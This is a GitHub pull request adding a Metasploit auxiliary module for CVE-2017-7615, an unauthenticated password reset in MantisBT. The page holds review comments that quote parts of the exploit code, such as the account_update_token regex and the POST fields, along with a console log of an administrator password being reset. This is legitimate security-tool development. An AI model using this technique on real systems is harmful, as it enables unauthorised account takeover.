Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add a module for CVE-2017-7615 #8671

Merged
merged 9 commits into from
Jul 12, 2017
Merged

Add a module for CVE-2017-7615 #8671

merged 9 commits into from
Jul 12, 2017

Conversation

jvoisin
Copy link
Contributor

@jvoisin jvoisin commented Jul 9, 2017

Add a module for CVE-2017-7615, aka an unauthenticated password reset in MantisBT.

Verification

List the steps needed to make sure this thing works

  • Setup MantisBT (you can get the version 1.3.0 here or from sourceforge)
  • Start msfconsole
  • use auxiliary/admin/http/mantisbt_password_reset
  • set RHOST <target IP>
  • Verify that the module outputs [+] Password successfully changed to …
  • Verify that the password works

4. Do: ```set rhost```
5. Do: ```run```
6. If the system is vulnerable, the module should tell you that the password
was successfulyl changed.
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

"successfully"

['CVE', '2017-7615'],
['EDB', '41890'],
['URL', 'https://mantisbt.org/bugs/view.php?id=22690']
['URL', 'http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt']
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Inconsistent indentation

],
'Platform' => ['win', 'linux'],
'Privileged' => false,
'DisclosureDate' => "Apr 16, 2017"))
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I don't think , is allowed in DisclosureDate.

Make sure you run tools/dev/msftidy.rb

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

It doesn't raising any warnings here.

'vars_post' => {
'verify_user_id' => datastore['USERID'],
'account_update_token' => $1,
'realname' => 'jvoisin',
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Can the realname be randomized? Rex::Text.rand_text_alpha(rand(5) + 8)

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Sure

password = datastore['PASSWORD']
end

res.body =~ /<input type="hidden" name="account_update_token" value="([a-zA-Z0-9_-]+)"/
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Is this meant to be an if conditional?

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Nope, it's meant to get the token later, with $1.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Will MantisBT accept the request if the account_update_token is '' ?

If not, it might be nice to handle this scenario, with something like:

if res.body =~ /<input type="hidden" name="account_update_token" value="([a-zA-Z0-9_-]+)"/
  token = $1
else
  fail_with(Failure::UnexpectedReply, 'Could not retrieve account_update_token')
end

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Sure ♥

['URL', 'http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt']
],
'Platform' => ['win', 'linux'],
'Privileged' => false,
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Privileged can be removed for auxiliary modules.

if datastore['PASSWORD'].blank?
password = Rex::Text.rand_text_alpha(8)
else
password = datastore['PASSWORD']
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Does MantisBT make use of a password complexity policy? It might be nice to print_warning if the specified password is too weak to pass the complexity requirements.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Absolutely not :D

@bcoles
Copy link
Contributor

bcoles commented Jul 9, 2017

Thanks @jvoisin !

[
['CVE', '2017-7615'],
['EDB', '41890'],
['URL', 'https://mantisbt.org/bugs/view.php?id=22690']
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Missing comma , at end of line.

@pbarry-r7
Copy link
Contributor

Verified, works as advertised for me (and did, indeed, change my Administrator account's password!):

$ ./msfconsole -q
msf > use auxiliary/admin/http/mantisbt_password_reset
msf auxiliary(mantisbt_password_reset) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf auxiliary(mantisbt_password_reset) > set TARGETURI mantisbt
TARGETURI => mantisbt
msf auxiliary(mantisbt_password_reset) > run

[+] Password successfully changed to 'KEYooXFe'.
[*] Auxiliary module execution completed

I have a few very minor style (and one spelling) tweak, will commit then land. Thanks, @jvoisin!

@pbarry-r7 pbarry-r7 merged commit 5802196 into rapid7:master Jul 12, 2017
pbarry-r7 added a commit that referenced this pull request Jul 12, 2017
@pbarry-r7
Copy link
Contributor

pbarry-r7 commented Jul 12, 2017

Release Notes

The ability to reset the password associated with any user ID for vulnerable versions of MantisBT has been added.

@alrosenthal-r7 alrosenthal-r7 added the rn-enhancement release notes enhancement label Jul 13, 2017
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
feature module rn-enhancement release notes enhancement
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

4 participants